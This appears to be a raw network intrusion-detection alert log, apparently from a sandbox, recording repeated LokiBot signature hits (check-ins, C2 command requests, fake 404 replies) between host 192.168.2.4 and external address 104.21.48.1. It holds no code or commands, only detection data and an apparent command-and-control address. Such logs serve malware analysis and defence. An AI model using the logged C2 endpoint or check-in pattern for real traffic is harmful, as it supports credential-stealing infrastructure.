2025-02-24T08:41:00.308231+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:41:00.308231+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:41:00.314010+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49780	TCP
2025-02-24T08:41:00.499203+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:00.499203+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:00.499203+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:01.267591+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:01.267591+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:01.272765+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49781	TCP
2025-02-24T08:41:01.471056+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:01.471056+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:01.471056+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:02.224843+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:02.224843+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:02.239014+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49782	TCP
2025-02-24T08:41:02.439271+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:02.439271+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:02.439271+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:03.173833+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:03.173833+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:03.364815+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:03.364815+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:03.364815+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:04.134837+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:04.134837+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:04.363415+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:04.363415+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:04.363415+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:05.094385+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:05.094385+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:05.313428+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:05.313428+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:05.313428+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.079662+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.079662+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.084858+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49786	TCP
2025-02-24T08:41:06.266860+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:06.266860+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:06.266860+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:06.987400+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:06.987400+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:07.223130+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:07.223130+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:07.223130+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:08.013690+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:08.013690+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:08.018819+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49788	TCP
2025-02-24T08:41:08.207649+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:08.207649+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:08.207649+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.006286+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.006286+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.011425+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49790	TCP
2025-02-24T08:41:09.194590+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:09.194590+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:09.194590+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:09.984363+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:09.984363+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:10.164113+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:10.164113+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:10.164113+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:10.958410+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:10.958410+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:10.963926+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49798	TCP
2025-02-24T08:41:11.141303+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:11.141303+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:11.141303+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:11.868340+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:11.868340+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:12.035898+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.035898+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.035898+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.700663+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.700663+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.705687+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49815	TCP
2025-02-24T08:41:12.870311+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:12.870311+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:12.870311+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:13.521427+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:13.521427+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:13.526559+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49821	TCP
2025-02-24T08:41:13.692580+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:13.692580+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:13.692580+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:14.443762+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:14.443762+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:14.449049+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49827	TCP
2025-02-24T08:41:14.622816+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:14.622816+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:14.622816+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:15.373149+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:15.373149+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:15.553276+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:15.553276+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:15.553276+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:16.331658+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:16.331658+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:16.336695+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49839	TCP
2025-02-24T08:41:16.510554+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:16.510554+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:16.510554+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:17.131972+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:17.131972+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:17.137098+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49848	TCP
2025-02-24T08:41:17.303496+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:17.303496+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:17.303496+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.077139+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.077139+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.082165+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49854	TCP
2025-02-24T08:41:18.267430+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:18.267430+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:18.267430+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:18.888522+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:18.888522+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:18.893595+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49862	TCP
2025-02-24T08:41:19.069504+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:19.069504+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:19.069504+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:19.815156+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:19.815156+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:19.820190+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49868	TCP
2025-02-24T08:41:20.023495+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.023495+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.023495+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.748214+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.748214+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.935903+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:20.935903+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:20.935903+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:21.652618+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:21.652618+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:21.822435+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:21.822435+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:21.822435+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:22.563585+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:22.563585+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:22.752347+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:22.752347+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:22.752347+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:23.386428+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:23.386428+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:23.391403+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49897	TCP
2025-02-24T08:41:23.553323+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:23.553323+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:23.553323+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:24.355116+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:24.355116+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:24.360148+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49903	TCP
2025-02-24T08:41:24.528729+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:24.528729+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:24.528729+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:25.314763+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:25.314763+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:25.320397+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49909	TCP
2025-02-24T08:41:25.873164+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:25.873164+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:25.873164+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:26.615613+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:26.615613+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:26.621350+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49917	TCP
2025-02-24T08:41:26.796281+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:26.796281+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:26.796281+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:27.520016+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:27.520016+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:27.699453+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:27.699453+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:27.699453+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:28.327484+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:28.327484+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:28.334290+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49931	TCP
2025-02-24T08:41:28.632962+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:28.632962+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:28.632962+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:29.373821+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:29.373821+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:29.379930+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49936	TCP
2025-02-24T08:41:29.560064+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:29.560064+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:29.560064+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:30.197795+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:30.197795+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:30.202799+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49943	TCP
2025-02-24T08:41:30.385197+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:30.385197+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:30.385197+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:32.152769+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:32.152769+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:32.375440+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:32.375440+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:32.375440+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:33.144353+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:33.144353+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:33.149472+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49964	TCP
2025-02-24T08:41:33.318019+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:33.318019+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:33.318019+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:34.038924+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:34.038924+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:34.228783+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:34.228783+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:34.228783+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49976	104.21.48.1	80	TCP
